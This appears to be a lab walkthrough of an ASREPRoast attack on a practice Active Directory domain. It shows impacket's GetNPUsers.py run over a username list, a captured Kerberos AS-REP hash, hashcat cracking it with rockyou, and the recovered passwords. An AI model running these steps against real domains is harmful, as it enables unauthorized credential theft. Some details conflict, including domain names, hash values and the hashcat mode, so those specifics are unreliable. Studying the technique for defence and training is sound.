Exploiting Username - ASREPRoast

The ASREPRoast attack looks for users without Kerberos pre-authentication required attribute (DONT_REQ_PREAUTH).

That means that anyone can send an AS_REQ request to the DC on behalf of any of those users, and receive an AS_REP message. This last kind of message contains a chunk of data encrypted with the original user key, derived from its password. Then, by using this message, the user password could be cracked offline.

Furthermore, no domain account is needed to perform this attack, only connection to the DC. However, with a domain account, a LDAP query can be used to retrieve users without Kerberos pre-authentication in the domain. Otherwise usernames have to be guessed.

ASREP - roasting

We create a users.txt file with all the user name previously found on north.sevenkingdoms.local

cat users.txt

Administrator
vagrant
krbtgt
newyork$
pablo.Sandoval
fernando.Alonzo
valentino.alcantara
matias.Almonte
alejandro.Rodriguez
claudio.Ortiz
salvador.Aguilar
pacofish
elena.Lopez
miguel.Cabrera
joel.exposito
sql_svc

We now could try asreproasting on all the users with impacket:

GetNPUsers.py north.newyork.local/ -no-pass -usersfile users.txt
Impacket v0.10.1.dev1+20230216.13520.d4c06e7f - Copyright 2022 Fortra


[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User vagrant doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User newyork$ doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User pablo.Sandoval doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User fernando.Alonzo doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User valentino.alcantara doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User matias.Almonte doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User alejandro.Rodriguez doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$claudio.Ortiz@NORTH.NEWYORK.LOCAL:da4d51f644d3ecb45e27f06ece85208a$6309c44863f889a9d8e4110fe174ca5f67826b6215472e897637943ea4af45d172faaccf6529365d0d3949d52c6a8905b7691aa53c1593bbb34cd74306468e77bec9f2b54f333dff724bed1083cdbe77bafacc4ff30ce815720413ee7e68e328ab3b5378c8c05fb7554bde27e2a81c377158bc92f0d1c1d31157f74d9fa00499076eb78cb77ca550b64cbd807b6a2d9999aec3ed82a02508e135f8a88797d11004badc734c1dc146a21822f48470be75f23c3b9b1c67a63c0e0265252fc24cab1521ee209627206d3fc28927717e8ec72be6b2285a77b7ca04d0ae74c2ce37aa194f762d32c70687a4f6074223e39a77b7af0616eb7acae8b040
[-] User salvador.Aguilar doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User pacofish doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User elena.Lopez doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User miguel.Cabrera doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User joel.exposito doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User sql_svc doesn't have UF_DONT_REQUIRE_PREAUTH set

  • We get a ticket for claudio.ortiz and we will try to break it the user don’t require kerberos pre-authentication.

  • This needs to be done on your local machine


#move rockyou.txt.gz to your current directory
sudo mv /usr/share/wordlists/rockyou.txt.gz .

#unzip rockyou.txt.gz
gzip -d rockyou.txt.gz

#let's start cracking
hashcat -m 18200 '$krb5asrep$23$claudio.Ortiz@NORTH.NEWYORK.LOCAL:8e75978f6243551a3faf9c5632763627$f07b53f1af9ef89392c6097c8c60e95a400040b4ec23c986fc96d4b0dca59978cd5d2c917667a2ff6f0acb292df72360ba334a8153bd686b29245af993a268927a3b8b2317933802ff9360ddb86b503de8ee7f0917302c699f1e3819c7ffe65d989dc1e0925cc5baf62cbc083920f043a18bbb2a397fc72cfc9944e7d0167040588ce708aedca46d1e66d0b398e647c3158e8c69b5e8fa19a23ff1c7f4517a6f6210ceb5e2eccc6f520180303daaaa2dbeaf1e16c55cca50ea3db870b521cc8c14a51f3c6fc4f31766c6aa328c596380f417d82d78c31047e20ed6a29cdc6d34dafd8d83cf57582e5b4a3a04a14c4490f55be11c239f8c121306' -a 3 rockyou.txt

-m = is the mode (18200 | Kerberos 5, etype 23, AS-REP)
-a = --attack-mode = (0 | Straight, 1 | Combination, 3 | Brute-force ,6 | Hybrid Wordlist + Mask, 7 | Hybrid Mask + Wordlist)




$krb5asrep$23$claudio.Ortiz@NORTH.NEWYORK.LOCAL:8e75978f6243551a3faf9c5632763627$f07b53f1af9ef89392c6097c8c60e95a400040b4ec23c986fc96d4b0dca59978cd5d2c917667a2ff6f0acb292df72360ba334a8153bd686b29245af993a268927a3b8b2317933802ff9360ddb86b503de8ee7f0917302c699f1e3819c7ffe65d989dc1e0925cc5baf62cbc083920f043a18bbb2a397fc72cfc9944e7d0167040588ce708aedca46d1e66d0b398e647c3158e8c69b5e8fa19a23ff1c7f4517a6f6210ceb5e2eccc6f520180303daaaa2dbeaf1e16c55cca50ea3db870b521cc8c14a51f3c6fc4f31766c6aa328c596380f417d82d78c31047e20ed6a29cdc6d34dafd8d83cf57582e5b4a3a04a14c4490f55be11c239f8c121306:babyboy
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 18200 (Kerberos 5, etype 23, AS-REP)
Hash.Target......: $krb5asrep$23$claudio.Ortiz@NORTH.NEWYORK.LOCAL:8e7...121306
Time.Started.....: Wed Feb 22 08:32:49 2023 (0 secs)
Time.Estimated...: Wed Feb 22 08:32:49 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Mask.......: babyboy [7]
Guess.Queue......: 286/14336793 (0.00%)
Speed.#1.........:    10958 H/s (0.01ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 1/1 (100.00%)
Rejected.........: 0/1 (0.00%)
Restore.Point....: 0/1 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: babyboy -> babyboy
Hardware.Mon.#1..: Util: 46%

Started: Wed Feb 22 08:32:23 2023
Stopped: Wed Feb 22 08:32:50 2023

We now have two couple of credentials

miguel.cabrera = ilovebaseball
claudio.ortiz = babyboy
Previoussetup /etc/hosts and kerberosNextPassword Spraying

Last updated